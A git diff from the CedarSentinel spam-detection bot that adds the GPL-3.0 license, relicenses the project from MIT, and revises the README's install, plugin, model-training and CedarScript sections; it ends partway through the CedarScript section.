diff --git a/.gitignore b/.gitignore index 14038be..26ed0c3 100644 --- a/.gitignore +++ b/.gitignore @@ -1,5 +1,7 @@ config.yaml knownUsers.json spamLog.json +gptc_data +reputation_data __pycache__ spamImages diff --git a/GPL-3.0 b/GPL-3.0 new file mode 100644 index 0000000..f288702 --- /dev/null +++ b/GPL-3.0 @@ -0,0 +1,674 @@ + GNU GENERAL PUBLIC LICENSE + Version 3, 29 June 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU General Public License is a free, copyleft license for +software and other kinds of works. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +the GNU General Public License is intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. We, the Free Software Foundation, use the +GNU General Public License for most of our software; it applies also to +any other work released this way by its authors. You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + To protect your rights, we need to prevent others from denying you +these rights or asking you to surrender the rights. Therefore, you have +certain responsibilities if you distribute copies of the software, or if +you modify it: responsibilities to respect the freedom of others. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must pass on to the recipients the same +freedoms that you received. You must make sure that they, too, receive +or can get the source code. And you must show them these terms so they +know their rights. + + Developers that use the GNU GPL protect your rights with two steps: +(1) assert copyright on the software, and (2) offer you this License +giving you legal permission to copy, distribute and/or modify it. + + For the developers' and authors' protection, the GPL clearly explains +that there is no warranty for this free software. For both users' and +authors' sake, the GPL requires that modified versions be marked as +changed, so that their problems will not be attributed erroneously to +authors of previous versions. + + Some devices are designed to deny users access to install or run +modified versions of the software inside them, although the manufacturer +can do so. This is fundamentally incompatible with the aim of +protecting users' freedom to change the software. The systematic +pattern of such abuse occurs in the area of products for individuals to +use, which is precisely where it is most unacceptable. Therefore, we +have designed this version of the GPL to prohibit the practice for those +products. If such problems arise substantially in other domains, we +stand ready to extend this provision to those domains in future versions +of the GPL, as needed to protect the freedom of users. + + Finally, every program is threatened constantly by software patents. +States should not allow patents to restrict development and use of +software on general-purpose computers, but in those that do, we wish to +avoid the special danger that patents applied to a free program could +make it effectively proprietary. To prevent this, the GPL assures that +patents cannot be used to render the program non-free. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Use with the GNU Affero General Public License. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU Affero General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the special requirements of the GNU Affero General Public License, +section 13, concerning interaction through a network will apply to the +combination as such. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + + If the program does terminal interaction, make it output a short +notice like this when it starts in an interactive mode: + + Copyright (C) + This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, your program's commands +might be different; for a GUI interface, you would use an "about box". + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU GPL, see +. + + The GNU General Public License does not permit incorporating your program +into proprietary programs. If your program is a subroutine library, you +may consider it more useful to permit linking proprietary applications with +the library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. But first, please read +. diff --git a/LICENSE b/LICENSE index 8cba028..6185cb6 100644 --- a/LICENSE +++ b/LICENSE @@ -1,12 +1,34 @@ -Copyright 2021 Matthew Petry (fireTwoOneNine), Samuel Sloniker (kj7rrv) +Copyright 2021-2024 Matthew Petry (fireTwoOneNine), Samuel Sloniker (kj7rrv) -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), -to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, -and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: +This program is free software: you can redistribute it and/or modify it under +the terms of the GNU General Public License as published by the Free Software +Foundation, either version 3 of the License, or (at your option) any later +version. -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. +This program is distributed in the hope that it will be useful, but WITHOUT ANY +WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A +PARTICULAR PURPOSE. See the GNU General Public License for more details. +You should have received a copy of the GNU General Public License along with +this program. If not, see . -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, -DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE -OR OTHER DEALINGS IN THE SOFTWARE. +Code from commit 9dbe028c8f8fb765e963cd5cd59b8a2b04a30178 and earlier, +including all code by Matthew Petry, was released under the MIT license, and +may still be used under its terms: + +Permission is hereby granted, free of charge, to any person obtaining a copy of +this software and associated documentation files (the "Software"), to deal in +the Software without restriction, including without limitation the rights to +use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies +of the Software, and to permit persons to whom the Software is furnished to do +so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/README.md b/README.md index 7b59c59..048c0f4 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -![Cedar Sentinel](/readme_files/logo_sm.png) +![CedarSentinel](/readme_files/logo_sm.png) ## A Discord/IRC bot for automated spam detection ### About @@ -7,33 +7,38 @@ automatically detect spam messages *(or any sort of message you don't like!)*. It can alert your moderators instantly, allowing them to take action faster. It also has support for -[**Matterbridge**](https://github.com/42wim/matterbridge/)-type chat bridges, +[Matterbridge](https://github.com/42wim/matterbridge/)-type chat bridges, allowing it to also handle messages from many more chat platforms! +CedarSentinel can be extended using plugins. It comes with three plugins by +default. `cs_gptc` uses [GPTC](https://git.kj7rrv.com/kj7rrv/gptc) to analyze +the content of messages. `cs_reputation` tracks user reputation; this can be +incremented or decremented automatically. Finally, `cs_length` simply indicates +the number of characters in the message. + +Unless you are writing your own plugin, it is unlikely that you will not want +to use the `cs_gptc` module, as it does most of the work in actually +determining whether or a message is spam. It is also a good idea to use +`cs_reputation` to prevent the bot from deleting messages from trusted users. +GPTC does occasionally flag messages incorrectly, so exempting established +users from having messages automatically deleted helps to reduce false +positives. `cs_length` may be helpful if you find that CedarSentinel often +incorrectly flags short messages as spam; GPTC seems to be less accurate at +classifying very short messages. You can configure CedarSentinel to not delete +messages under a certain length. + ### How to install ```bash git clone https://github.com/fire219/CedarSentinel.git cd CedarSentinel -pip install pyyaml discord.py irc git+https://git.kj7rrv.com/kj7rrv/gptc@master -cp exampleconfig_.yaml config.yaml +pip install pyyaml discord.py irc gptc tornado lark +cp example_config.yaml config.yaml # edit the config file with your editor of choice! ``` -After doing this, Cedar Sentinel can be executed in the same way as any other -Python script. - -#### Configuring for use with OCR - -CedarSentinel can be optionally configured to do [Optical character recognition](https://en.wikipedia.org/wiki/Optical_character_recognition) (also known as OCR) on all images. This system requires many additional Python modules to be installed: - -```bash -apt install tesseract-ocr # or the equivalent command in your OS of choice -pip install opencv-python pytesseract numpy # this command is unnecessary if you don't want image OCR functionality -# change the value of "ocrEnable" in your config.yaml file to "true" to enable OCR -``` - -If any of the above modules are missing, CedarSentinel will alert you at startup, but otherwise will work normally (albeit with OCR disabled). +After doing this, CedarSentinel can be executed in the same way as any other +Python script; the file to run is `bot.py`. ### Using CedarSentinel @@ -50,136 +55,92 @@ that *aren't* spam, check out the ***How to train models*** section below. ### How to train models As previously mentioned, CedarSentinel comes with a model trained for the -Pine64 Chat Network. If this model just isn't working for you, then it is -time to check out the **modelbuilder.py** tool included with CedarSentinel. - -The Model Builder is designed to intake spam logs that CedarSentinel itself -creates *(assuming you have it enabled in the config!)* and convert them into -GPTC models that CedarSentinel makes its decisions based on. - -As a starting point, **empty_model.json** is included for use in training from -scratch. If you wish to do so, configure CedarSentinel to use this model. If -you want to build on the existing data, leave it with the default model. Now, -let it sit running in your chat for a while. Assuming you haven't dramatically -changed `script.txt` (see "CedarScript" below), it should start logging -messages in your server. *(If you used the empty_model, it will likely log all -messages!)*. After an indeterminate amount of time (up to you, but more -messages are better!), it's time to use the Model Builder. - -First, run it as `modelbuilder.py import`. This will import the messages from -your "spam" log into its workspace. It should then show you a message and ask -you if it is Good, Spam, or Unknown. Answer accordingly, and then hit enter. -It will then give you the next message, and so on. Take your time, and make -sure you label messages correctly. CedarSentinel relies on this data to make -its decisions. If you need to stop at any time, hit Ctrl+C, and it will save -your progress and exit. Remember to delete `spam_log.json` after -`modelbuilder.py import`! When its time to start labeling the messages again, -simply run `modelbuilder.py` without arguments, and it will start back where -you left off. - -Once you have labeled all messages in your log, you now need to compile the -model. You can do this by simply running `modelbuilder.py compile`. At this -point, your new model (at **compiled_model.json**) is ready for use in -CedarSentinel! Go ahead and delete your existing spam log, set CedarSentinel -to use this model in the config, and restart it! If you've followed these -instructions properly, CedarSentinel should now be trained to work on your -server. - -As time goes on, you may refine the model by continuing to use the logs -CedarSentinel creates. You can follow these instructions again from -`modelbuilder.py import`, and as long as you have not deleted the workspace -file (**model_work.json**), it will build on your existing model. ***It will -take time to get CedarSentinel fully acclimated with your server, so don't be -alarmed if the first few iterations aren't very effective!*** As the model -improves, so will the detection rate. - -If you want to export your model in raw format for use with GPTC outside -CedarSentinel, run `modelbuilder.py export`. The raw model will be in -`raw_model_export.py`. +Pine64 Chat Network. If this model just isn't working for you, then it is time +to check out the GPTC module's training tool. This is accessed through a Web +interface, available at [`http://localhost:8888`](https://localhost:8888) when +CedarSentinel is running. Documentation is included on the page. + +For security reasons, this tool can only be accessed from `localhost`. If you +want to use it over a network, then you can either use a reverse proxy or +access it through a command-line browser over SSH; it is designed to work well +in [Lynx](https://lynx.invisible-island.net/current/) as well as graphical +browser. + +In most cases, the default model should be a good starting point, and you can +build on it instead of starting over. However, if you find that CedarSentinel +is not working well even after retraining with several days of new data, it may +be best to delete the model and start from scratch. To do this, simply stop +CedarSentinel, delete `gptc.db`, and restart the bot. This will delete the +entire model and all logged messages, allowing for a fresh start. ### CedarScript -CedarSentinel's responses to messages are defined by `script.txt`. Note that a -syntax error in `script.txt` will likely result in an error message that -appears to be caused by a bug in CedarSentinel. (If you do get an error, -please submit an issue anyway, just in case it is a CedarSentinel bug. If you -have changed `script.txt`, please include your modified version.) - -#### `if ... end` - - if ... - ... - end - -#### `if ... else ... end` - - if ... - ... - else - ... - end - -#### Comparisons +CedarSentinel's responses to messages are defined by `script.txt`. This file is +written in CedarScript, a domain-specific language (DSL) designed for this +purpose. Please note that CedarScript is not Turing-complete; it is designed to +express simple if-else logic, not advanced algorithms. -CedarScript's comparison syntax is different from that of most programming 